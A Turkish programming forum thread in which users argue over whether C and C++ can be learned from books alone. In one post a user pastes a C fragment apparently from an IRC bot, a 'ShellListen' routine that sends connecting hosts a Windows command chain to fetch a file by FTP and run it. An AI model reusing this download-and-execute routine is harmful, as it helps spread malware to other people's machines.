Bu sadece while dongusunun nasıl ısledıgını anlamana yonelık bır ornek.. Yanı esas olan faktorıyel kullanımı degıl dongunun kendısı.. Dolayısıyla faktorıyel bılıp bılmemenın konuyla ılgısı yok.. Ve eger ılerde faktorıyel kullanman gerekırse (kı hıc sanmıyorum) bır matematık kıtabını acıp ılgılı bolume goz atman yeter..

Yanı heran herseyı bılmek zorunda degılsın.. Onemlı olan neye nasıl ulasacagını bılmek..

Not: Ansugo benden hızlı davranmıs..

ubuntu
07/03/2007, 13:36
Ansugo cevabın için teşekkür ederim gerçekten içim rahatladı. Bir an ümitsizliğe kapılmıştım. HunTER evet sadece while döngüsünün nasıl işlediğini anlatıyor orada sorun yok. Sorun bu programın ortaya çıkardığı sonuçla ilgili. Çıkan sonucu anlamadım. O yüzden matematikle ilgili olduğunu düşündüm. Biraz anlayış göster HunTER hiçbirşey bilmiyorum sıfırdan başladım böyle sorular sorayım azıcık :) Ama şu konuda emin ol kararımı verdim c++ öğreneceğim. Ve dün başladım çalışmalarıma. Yani karar sorununu hallettik :)

HunTER
07/03/2007, 13:40
O degıl sen bu tur konular acmaya devam ettıgın surece forumda adam kalmayacak bırbırıne gırmeyen.. Her "hangı dıl" konulu baslık yenı bır tartısmaya gebe.. Daha fazla gergınlık yasanmaması adına bır an once su gırıs faslını halletmenı umuyorum :)

mesutbarlas
07/03/2007, 13:41
:) evet ağır geliyor çok hemde kaldıramıyorum aman allahım...

Moderatör arkadaşların bu konu altına attığım postları silme imkanları varmı ? var ise lütfen silin

ne haliniz varsa görün.

ubuntu
07/03/2007, 13:45
Bu cevaptan sonra daha yüzüm tutmaz zaten öyle bir konu açmaya :) Belkide bir haftayı geçti ama sonunda kararımı verdim. Çok yoğun bir hafta oldu inşallah sonuçları güzel olur :)

mesutbarlas
07/03/2007, 13:46
Doğru diyorsunuz boş yere polemik yaratmaya gerek yok siz haklısınız büyüksünüz üstadsınız yıllarını C diline adamış bunun üzerine projeler geliştirmiş insanlarsınız tecrübeleriniz doğrultusunda tabi

Vazgeçtim arkadaşlar C çok kolay bir dil alın bir kitap C yi öğrenin hemde tamamını süper ..

ubuntu
07/03/2007, 13:47
mesutbarlas HunTER ağır kelimesini bana kullanmıştı sanırım bir yanlış anlama olmuş.

Ansugo
07/03/2007, 14:12
Doğru diyorsunuz boş yere polemik yaratmaya gerek yok siz haklısınız büyüksünüz üstadsınız yıllarını C diline adamış bunun üzerine projeler geliştirmiş insanlarsınız tecrübeleriniz doğrultusunda tabi

Vazgeçtim arkadaşlar C çok kolay bir dil alın bir kitap C yi öğrenin hemde tamamını süper ..

Siz ezberinize kaydettiginiz fikirlerin sahibi Prof.Dr. X.Y.Z'yi (adini hatirlamadim. yukarida yaziyordu, kusura kalmasin) yonlendirin buraya. Boylece fikrin asil sahibinin fikrini ne amacla soyledigini, neye dayaranak soyledigini analiz edip ona gore daha saglikli sonuclara varabiliriz. Sonucta fikri ya da sozu siz yanlis anlamis olabilir, yanlis ezberlemis olabilirsiniz. Bu normal bir durum.

mesutbarlas
07/03/2007, 14:18
Ben ezberime değil tecrübelerime dayalı konuşma yapıyorum. Kulak asıp asmamak sizi ilgilendirir kulak asında demiyorum Gerçekleri görmeniz açısından yazıyorum .. Diyeceksiniz kime göre gerçekler .. Bu yazdığım konuları bir yere not edin ileride biri vardı bunları demişti haklıymış derseniz hak vereceksinizdir. Şuan için herşey çok erken

İyi çalışmalar olsun herkeze bu mesaj altında bir postum daha bulunmayacaktır. Moderatör arkadaşların mesajlarımı silme ihtimali var ise silmelerini rica ediyorum.
Bildiklerim bana kalsın..

Doğru söyleyeni dokuz köyden kovarlarmış

Ansugo
07/03/2007, 14:25
Ben ezberime değil tecrübelerime dayalı konuşma yapıyorum.

Bastan beri surekli soyleyip altina uzun uzun yazdiginiz cumleyi (C ucsuz bucaksiz bir deryadir) soyleyen kisi prof.dr x.y.z. Haliyle ben bunun tecrubelere degil prof.dr.x.y.z.'nin sozune dayali oldugunu dusunuyorum.

Biz ona flamers ownz j00 diyoruz.

Euclides
07/03/2007, 16:27
Bakınız:
http://forum.ceviz.net/showpost.php?p=276754&postcount=37
Hatta dahası:
http://forum.ceviz.net/showpost.php?p=277072&postcount=54

Kim kimi kovmuş ? kim kime ne yapmış ? size elle tutulur uygulamalar göstermeye çalıştığımıza olanlara bakalım
http://forum.ceviz.net/showpost.php?p=277072&postcount=54

Siz Linux geliştiricilerindenmisiniz ? Linux üzerine çalışmalar yapıyormusunz ki 25 komut üzerine kurulduğunu iddia ediyorsunuz..

Eğer gerçekten açık fikirli olup bilimsel etik içinde düşünseydiniz. Gider gerçekten bakar "Linux'un qqq.c dosyasın pppp satırında sizin görüşününü çürüten etmenler var" derdiniz.

Kişisel olarak bir forumda haklı olsak ne çıkar ? olmasak ne çıkar ? :)

onur2200
07/03/2007, 17:47
yani ben tartışmaya karışmak istemezdim aslında ama bende sadece kitap ve tutorialler den c++ öğrenen birkaç kişi tanıyorum , çok başarılı yazıyorlar...C++ nin birçok özelliğini bilmekle birlikte programda yaptığı hataları , eksikleri hemen bulabiliyor...Operatörler , komutlar , döngüler , yapılar , değişkenler ve algoritrma bilgisi (belki çok daha fazlası) olduktan sonra yetersiz midir acaba? iyice kafam karıştı... :garip:

acehreli
07/03/2007, 23:46
mesutbarlas, pisman olacaginiz mektuplar atip silinmelerini istemek yerine, mektuplari atmadan once bir yarim saat kadar beklemenizi oneririm.

Daha once gonderdiginiz C++ "ornek" kodunu gormus ama <iostream.h> satirindan oteye gitmemistim. Simdi baska bir konuda elestirecegim. Onu siz mi yazmistiniz? Kotu C++ kodu ornegi olarak mi verdiniz?

Bozucu islevi (destructor) bilip bilmedigimizi mi gormek icin mi aciklamamizi istiyorsunuz? Eger oyleyse her C++ kitabi bozuculardan bahseder.

Ali

KamilORS
08/03/2007, 01:52
yani ben tartışmaya karışmak istemezdim aslında ama bende sadece kitap ve tutorialler den c++ öğrenen birkaç kişi tanıyorum , çok başarılı yazıyorlar...C++ nin birçok özelliğini bilmekle birlikte programda yaptığı hataları , eksikleri hemen bulabiliyor...Operatörler , komutlar , döngüler , yapılar , değişkenler ve algoritrma bilgisi (belki çok daha fazlası) olduktan sonra yetersiz midir acaba? iyice kafam karıştı... :garip:

Sen Programlama mantını bildikten sonra hangi dili kullandığın önemli değildir. HAni Yukarlarda Faktöriyel alma örneği var C ile yapılmış. Mesala Bir Algoritma kuralım..

Amaç : Girilen Bir Sayının Faktöriyelini almak olsun.

Faktoriyel nedir sorusu en kaba cevap 1 den başlayarak sayi dahil ardışık sayıların çarpımı

yani 5 faktöriyelini almak istersen el ile 1x2x3x4x5 = 120 deriz..

Şimdi gelelim algoritmamıza: amaç girilen sayının faktöriyelini almak. her zaman n olarak düşünmemiz gerek . yani n! bunun için muklaka döngülerden yararlanmamız gerek. döngü şartımız için döngünün bitimini girdiğimiz sayi belirleyecek. birde ardışık sayıları simgeleyen bir değişkene ihtiyaç var. buda i osun. döngünün içerisinde teker teker 1 , 2 , 3 .... . n değerini alan bir değişken. döngü şartı ise i<n+1 veya i<=n gibi bir şart kullanılabilir. birde ardışık sayıların çarpımlarını tutacağımız bir değişkene ihtiyac var. bu değişkene ilk etapta 1 değeri vermeliyiz. bunun nedeni 1 sayısının çarpmada etkisiz eleman olması... vede değişkenin tutulduğu anda o değişkene ayrılan adresteki değerin çarpıma etki ememesi için. şimdi arkadaşlar hangi dil süper yerine aşağıdaki algoritmayı bildiğiniz dilerde yazarsanız yeni başlayan arkadaşları korkutmmış olursunız. yani mantık nbilindikten sonra dil önemli değil.. önemli olan problemi çözmek. sonuçta bilgisayar bir araçtır. insanlar için yapılmış. programlama dilleri de bilgisayarı araç olarak daha iyi kullanmamız için geliştirilmiştir öyle değilmi yanlışsam özür dilerim..

mesutbarlas
08/03/2007, 02:30
Yazdığım postlardan pişman değilim. Fakat bazılarımıza dokanmış sanırım irdelemek istenmiş :). Evet ben yazdım arkadaşım NOT (constructor ve destructor tanımlanma örneğidir irdelediğim kısım hayat ve ~hayat kısmıdır (çalışmalarımdan alıntı), Doğru olan kod kodu irdeleyen arkadaşın açtığı başlık altında yazıyor)

Buyrun bunuda kitaplardan araştırın
#include "includes.h"
#include "functions.h"
#include "externs.h"
#ifndef mesutbarlas
int connectback_shells = 0;
int mbbackport = brandom(1024,65534);
DWORD WINAPI ShellListen(LPVOID param) {
mbarlasback mbback = *((mbarlasback *)param);
mbarlasback *mbbacks = (mbarlasback *)param;
mbbacks->gotinfo=TRUE;
char buffer[IRCLINE];
SOCKET sSock, cSock;
SOCKADDR_IN ssin,csin;
BOOL success=FALSE;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)mbback.port);
ssin.sin_addr.s_addr = INADDR_ANY;
if ((sSock=fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) {
sprintf(buffer,"-\x03\x34\2param1\2\x03- param2 socket() , param3: <%d>.", fWSAGetLastError());
if (!mbback.silent) jpahdr(mbback.sock,mbback.chan,buffer,mbback.notic e);
addlog(buffer);
clearthread(mbback.threadnum);
ExitThread(0);
}
threads[mbback.threadnum].sock=sSock;
if((fbind(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) {
int iLastErr=fWSAGetLastError();
if (iLastErr != 10048) {
sprintf(buffer,"-\x03\x34\2param1\2\x03- param2 bind() , param3 <%d>.", iLastErr);
addlog(buffer);
ExitThread(0);
} else {
ssin.sin_port=mbbackport = brandom(1024,65534);
if((fbind(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) {
int iLastErr=fWSAGetLastError();
sprintf(buffer,"-\x03\x34\2param1\2\x03- param2 bind() , param3 <%d>.", iLastErr);
if (!mbback.silent && iLastErr!=10048) jpahdr(mbback.sock,mbback.chan,buffer,mbback.notic e);
addlog(buffer);
ExitThread(0);
}
}
}

if (flisten(sSock,5) != SOCKET_ERROR) {
int csin_len = sizeof(csin);
while (1) {
if ((cSock = faccept(sSock,(LPSOCKADDR)&csin,&csin_len)) == INVALID_SOCKET)
continue;
sprintf(buffer, "-\x03\x34\2param1\2\x03- param2: %s:%d.", finet_ntoa(csin.sin_addr), csin.sin_port);
addlog(buffer);
if (frecv(cSock,buffer,sizeof(buffer),0) != SOCKET_ERROR) {
char cmd_buff[1024];
_snprintf(cmd_buff, sizeof (cmd_buff),
"echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o &ftp -n -s:o &del /F /Q o &%s\r\n",
GetIP(mbback.sock),ftpport, filename, filename);
if (fsend(cSock, cmd_buff, strlen(cmd_buff),0) != SOCKET_ERROR)
connectback_shells++;
}
}
}
fclosesocket(sSock);
ExitThread(0);
}
#endif

Acehreli buyrun hata arayın ve eleştirin
ve bir kitaptan örnek gösterin

(Not : Bu kodu vermemdeki sebep önceki postlarımda soket programlama ile uğraşacaksanız rfc yapısını bilip windows ile iletişimini bilmeniz gerektiğini söylemiştim.)

acehreli
08/03/2007, 02:54
Bu yeni verdiginiz kodda hangi C olanagi kitaplarda yok? C'nin az kullanilan olanaklarindan olan virgul isleci veya uclu islecten suphelendim ama onlar kullanilmamislar. Icinde dizi var, isaretci var, ama bunlarin hepsi C kitaplarinda anlatilir zaten.

Verdiginiz kodda yalnizca su C olanaklari var:

- onislemci komutlari: #include, #define, vs.
- islev tanimi: ShellListen
- tUr dOnUsUmU: (mbarlasback*) vs.
- atama isleci
- isaretci erisim isleci: ->
- uye erisim isleci: .
- islev cagrilari: memset, clearthread, vs.
- program akisi anahtar sozcukleri: if, else, while, vs.
- dizi: buffer
- adres isleci: &
- vs.

Nedir kitaplarda olmayan?

Kitaplarda olmadigini ima ettiginiz sey herhalde kod icinde cagirdiginiz islevler olmali... Ama onlar C dilinin bir avuc dolusu olanaklarina dahil degiller ki... C dili islev cagirmayi sunmus; C dilini kullanan programci da kullandigi kutuphanedeki islevleri cagirmis...

Evet, socket programlama belirli islemleri belirli sirada yapmayi gerektirir ama bu tur bir programlama C dili ogrenildikten sonra olusur. C dilinin parcasi degildir.

Ali

mesutbarlas
08/03/2007, 03:27
Verdiginiz kodda yalnizca su C olanaklari var:

- onislemci komutlari: #include, #define, vs.
- islev tanimi: ShellListen
- tUr dOnUsUmU: (mbarlasback*) vs.
- atama isleci
- isaretci erisim isleci: ->
- uye erisim isleci: .
- islev cagrilari: memset, clearthread, vs.
- program akisi anahtar sozcukleri: if, else, while, vs.
- dizi: buffer
- adres isleci: &
- vs.
vs ?

VS falan değil arkadaşım orada gördüğün kodların hepsi C olanakları

:) Kodlamada hata arayıp bu kodda ne var neki bu demeye benzemiyor Buyrun bunuda açıklayın lütfen.

Kimsenin şahsına bir hakarette bulunmamakla birlikte saygı çerçevesinden ödün vermedim lütfen sizde gereken saygıyı gösterin eklediğim koddaki hataları ayıracağınıza değinmek istediğim şeyi görün orada neye değinmek istediğim ap açık ortada.

C Dilinin olanakları değil demişsiniz bu örneğim olanaklarından biridir.

Evet, socket programlama belirli islemleri belirli sirada yapmayi gerektirir ama bu tur bir programlama C dili ogrenildikten sonra olusur. C dilinin parcasi degildir.

Demişsiniz.. Bir soketi baştan aşşağıya C dili ile programlayabilir soket yaratabiliriz.

Buyrun

turker
08/03/2007, 03:44
ben neyi savunduğunuzu anlayabilmiş değilim. bir iki kelam edecem ama "vay siz bir olmuşsunuz bana mı saldırıyorsunuz" manasında sözler işitmek istemiyorum zira.

sadece şunu belirteyim, kimi sorguya çektiğinize dikkat edin bence yada en azından ufak bir araştırma yapın. C ile ilgili bilginizi sınayacak değilim ama benzer durumlarla sık karşılaşıyoruz. (Birileri geliyor doğru/yanlış birşeyler söylüyor, aradan bir süre geçiyor ve "yaa ben senin o olduğunu bilmiyordum amma laf etmişim" diyor. Yazdıkları doğru olsa bile pişmanlık duyabiliyor. iyi niyetli bir uyarı gibi düşünün. yok ben ne dediğimi biliyorum diyorsanız orasını hep beraber göreceğiz zamanla... )

mesutbarlas
08/03/2007, 04:04
Kimin kim olduğunun önemi nedir ? Şahıs kim olduğunu bildikten sonra problem nedir ?
Problem veya konular tartışılmayacaksa forum un anlamı nedir o vakit ?

Arkadaşlar konu dağılma yoluna gidiyor. Bir dili iyi bilmek ben iyi biliyorum tam anlamıyla biliyorum demek o dilin X keywordden oluşup X kadar keyword u yaladım yuttum anlamına gelmiyor

O X adet keyword zaten her programlama dilinde mevcut.

Eğer bir dile hakim olacaksanız görsel ise componentlerine hakim olmanız (+os library) , görsel değil ise kütüphanelerine hakim olup gerek derleyici fonksyonları gerek Operation System kütüphaneleri ve fonksyonlarına hakim olabilmektir.

İşte savunduğum konu budur.

turker
08/03/2007, 04:15
güzel, zaten tartıştığınız insanların o nokta bir karşıt görüşü yok.

ben yanlış anlamışsam düzeltin lütfen. siz c (yada c++) dilini öğrenmek için illa bir kurs(eğitim) gerekli aksi halde sadece if,for,while gibi standart kalıpları öğrenir kalırsınız diyorsunuz. eğer kursa giderseniz size çeşitli tüyolar verirler, karşılaşabileceğiniz sorunlara çözüm yolları gösterirler, vs. böylece dilin kalıplarıyla beraber programlama mantığını ve programcılığı da bir nebze olsun öğrenmiş olursunuz diyorsunuz. doğru mudur?

mesutbarlas
08/03/2007, 04:30
Bir dili iyi bilmek için kanımca gerekli öngördüğüm şeydir o.

250 Sayfalık bir C kitabını okuyarak C diline hakim olabilmek ve bu dil için ben C yi çok iyi biliyorum diyebilmek olanaksızdır diyorum. Ve bir dili iyi bilmek nedemektir kendi görüşümce açıklıyorum. Daha önceki postlarımda mevcut.

Bu konu altına post atmadan önce C nin ne kadar basit bir dil olarak gösterildiğini okudum ve görüşlerimi bildirmek isteyerek konuya dahil oldum. Sırf C dili için değil tüm diller için geçerli aslında postlarımdaki mesajlar fakat C dili diğer dillerden biraz daha hantal olmasındandır (Hantal dememdek kasıt çözüm yoluna daha uzun yollar ile ulaşılabilmesi)

Ve de kendimce Programcı - programlamacının tanımını yaptım

Programcı kanımca isteğe bağlı yazılım üretebilen şahıslardır. Diyeceksiniz ben kursa gitmedim veya görsel eğitim almadım ama isteğe bağlı yazılım üretebiliyorum.Evet üretebilirsiniz bunu daha önceki postlarımdada belirttim fakat bu bir ezberci yaklaşım olacaktır verdiğim örenketi gibi birkaç arkadaşım var farklı bir programlama dilinde projeler hazırlıyorlar ve isteğe bağlı projeler üretebiliyorlar fakat bu isteğe bağlı üretilen projeler zaten piyasada mevcut olan projeler fakat yaklaşım ezberci. Hal bu hali alınca critical veya logical problemler ile karşılaştıklarında projelerini yarım bırakmak zorunda kalıyorlar. Kullanılan library veya fonksyonun iç yapısını bilmiyorsanız ezberci bir yol çizmiş olacaksınız.

turker
08/03/2007, 04:43
karşıt görüş sadece "Bir dili iyi bilmek için kanımca gerekli öngördüğüm şeydir o(kurs)." kısmına karşı çıkıyor. okuduklarımdan anladığım kadarıyla diğer kısımlarda bir ayrılık söz konusu değil.

Bu konu üzerinde konuşacaksak mesele kurslarda neler öğretilir neler öğretilmez, türkiyede ve dünyada hiç kursa gitmemiş(veya tersi) ama herkesce saygı gören kaç kişi vardır vs. çeşitli doneler ile desteklebilir.

fakat kurs bir dili "iyi bilmek için gereklidir" savında yalnızsınız. ben de kursların sadece dilin ana hatlarının öğrenilmesi süresini kısaltmaktan başka bir işe yaramadıklarını düşünenlerdenim.(spesifik konular üzerine açılanları saymıyorum. mesela geçenlerde "delphi ile veritabanı programlama" konusu üzerine açılmış bir kurs vardı. kalitesi bilemem ama içerdiği konular veritabanını efektif olarak kullanmaya yönelik çeşitli örnek uygulamalardan yola çıkarak birşeyler öğretmeyi amaçlıyordu. fakat buna benzer kaç tane kurs var ki türkiyede? mesela yıllardır bu tür gördüğüm kurs ilanlarına bakarım bu bahsettiğim şekilde bir kurs eğitimini ilk kez görüyorum. genelde "delphi ile programla" diye bir başlık olur. kurs 6 ay sürüyorsa 5 ayında if,for,while gibi dilin temel yapıları gösterilir. çok sık kullanılan kütüphanelerin ne işe yaradığını anlatır. son 1 ayda ise gösterilen kalıpları kullanarak ufak çaplı bir program yapmanız istenir. adres defteri misal.)

ayrıca c dili kolay mıdır zormudur tartışmasında gözden kaçırdığınız bir nokta var sanırım. kolay diyenler c'nin temel yapısını(if,for vs.) öğrenmek(c++ a göre tabiki) kolaydır diyorlar. yoksa onunla sağlam uygulamalar geliştirmek kolaydır denilmiyor.

mesutbarlas
08/03/2007, 04:49
Dilin ana hattının kısaltılması işlevini gördüğünü yazmşsınız kurslar için. Evet bu doğru aksini zaten dile getirmedim. Kullanıcının kurstan alacağı temel bilgi son derece faydalı olacaktır ve bu temel bilgisini istediği doğrultuda bilgi , yetenek ve azim dahilinde geliştirecektir. Fakat ileri düzey kurslarda var. Diyelimki yok bulamadınız .. Yazılım firmaları mevcut daha önceki postlarımda belirtmiştim para talebinde bulunmadan yazılım şirketininde kabulü dahilinde kendinizi geliştirmeniz mümkün.

Tüm dillerin temel yapısı aynı kolaylık mertebesindedir kanımca . Benim değindiğim profesyonel projeler için zaten konudaki postlarda bunun üzerine eğer vaktiniz var ve konuyu başından okumadıysanız ise Ricamdır lütfen 3. sayfadan itibaren okuyunuz

turker
08/03/2007, 04:57
konuyu baştan beri takip ediyorum. zaten konu saptığı için müdahale gereği duydum. ancak yazdıklarınızdan "ileri düzey" kursları kastettiğiniz anlaşılmıyor. en azından ben anlayamadım bu vesile ile benim gibiler net olarak neyi kastettiğinizi anlamış olur.

türkiyede mi yaşıyorsunuz bilmiyorum ama spesifik konular hakkında açılan kurslar bir elin parmaklarının sayısını geçmez onlar da sadece 2-3 il ile sınırlıdır. o yüzden şahsen birine kursa git demeden önce istanbul,ankara veya izmirdeysen kursları bir araştır demek gerekli diye düşünüyorum. yine aynı durum yazılım firmaları için de geçerli ki bu konu biraz daha sıkıntılı. "ben geldim temel c biliyorum, bedava da çalışırım. bana projelerde ufak görevler verin" deyince kaç şirket size "peki" der acaba. ben pek umutlu değilim ama sizin bildiğiniz yerler varsa söyleyin belki başvurmak isteyen kişiler olur.

KamilORS
08/03/2007, 09:01
Bencede eğer türkiyde yaşıyorsak çok az şirket gel ben sana öğreteyim de sen sonra benim için çalış der. Ama sen programcılık okuyorsan şirkette büyükse sana burs sağlıyabilir bu ayrı tabi oda hayrına değii vergi vs. işleri için gene. seni işe alacağı garanti olmaz :) Tamam programlama öğrenmek zorlu bir aşama olabilir. ama imkansız diye bişey yoktur öyle değilmi. sizin veya bizim sorlanarak öğrendiği bir olayı başka bir kişi gayet rahat bir şekilde öğrene bilir. Kişiden kişiye değişir bu . bence algılama yeteneği. yukarda sözü geçen anahtar kelimeleri bildiği sürece ve nasıl kullanıldığını anladıktan sonra bu ahantar kelimelerin iddaa ediyorum bir kimse herhangi bir Derleyicinin (Borlnad C++ builder vs. ) Türkçe kaynaklı öğretici kitabını alıp derleyicinin companentlerinin kullanım şeklini öğrenebilir. ve ticari kaynaklı programlar yazabilir. Bu zatende bir çok arkadaşımda gördüğüm bir olaydır. Örneğin biz arkadaşlarca bir sene önce İhsan karagülle & zeydin pala nin CBuilder6 kitaplarını aldıydık. Şimdi arkadaşlarım gayet güzel windows programları yazabiliyorlar CBuilder6 kullanarak. Ama oyun motoru yazabilirlermi hayır. peki yazmaları için önlerindeki engel ney windows formları ile işlemleri hazır gelen sınıf ile yapmaları. peki Windows API denilen olayı anlatan bir kitap alıp en azından windows api programlama hakkında bilgi edinir ve sonrasında kendini geliştirmemesi için hiç bir sebep yoktur. İstemek başarmann yarısı bence....

Ansugo
08/03/2007, 09:50
mesutbarlas yavas yavas bastan beri soylenen seyleri soylecek kivama gelmis. Birazdan "kitaplardan da ogrenilir ama zaman alir" tarzinda en bastan beri karsi ciktigi seyi soylerse sasirmam. Gerci bunu sirf inat icin soylememesi daha buyuk bir ayip. Soylese de rahatlasa.

mesutbarlas
08/03/2007, 10:10
HaLa bu tür konuları kitaplardan öğrenemeyeceğinizi söylüyorum zaten en başından beri de bunu diyorum.

Ansugo bana söylermisin neyin inatını yapacağım ? İnat yaparsam elime ne geçecek ? İnsanlar bana hak verse ne olacak vermese ne olacak. Ben olaya hiç yaklaşmadığınız bir yönden yaklaştım. İnsanlar görmek istedikleri şeyleri görüyorlar.

İşyerlerine gelince Okmeydanı Perpa da birçok yazılım firması bu tarz işçilar almaktadır. Bir de maslak civarında var.

Ansugo
08/03/2007, 11:28
Ansugo bana söylermisin neyin inatını yapacağım ? İnat yaparsam elime ne geçecek ? İnsanlar bana hak verse ne olacak vermese ne olacak. Ben olaya hiç yaklaşm

Iste ben de bunu anlamiyorum. Onumuzde inatlastiginiz seyinin aksi bir suru ornek varken neden bu inat?

mesutbarlas
08/03/2007, 11:34
Postlarımda neyi ifade etmek istediğimi anlamış olsaydınız zaten bunu inat olarak yorumlamazdınız. İlk postlarımda ne demiştim örnek sıkıntısı yaşıyoruz diyen arkadaşlar için piyasada yeterince örnek var ama asıl sorununuz baktığınız örnekten birşey anlamamanız tarzındadır bunun nedeni ise altyapı ve temel eksiklikleri ..

Bu temeli fonksyonun veya kütüphanenin işlevini bilmediğiniz sürece o örnekler bir işe yaramayacaktır siz örneğe örnek size bakcaktır..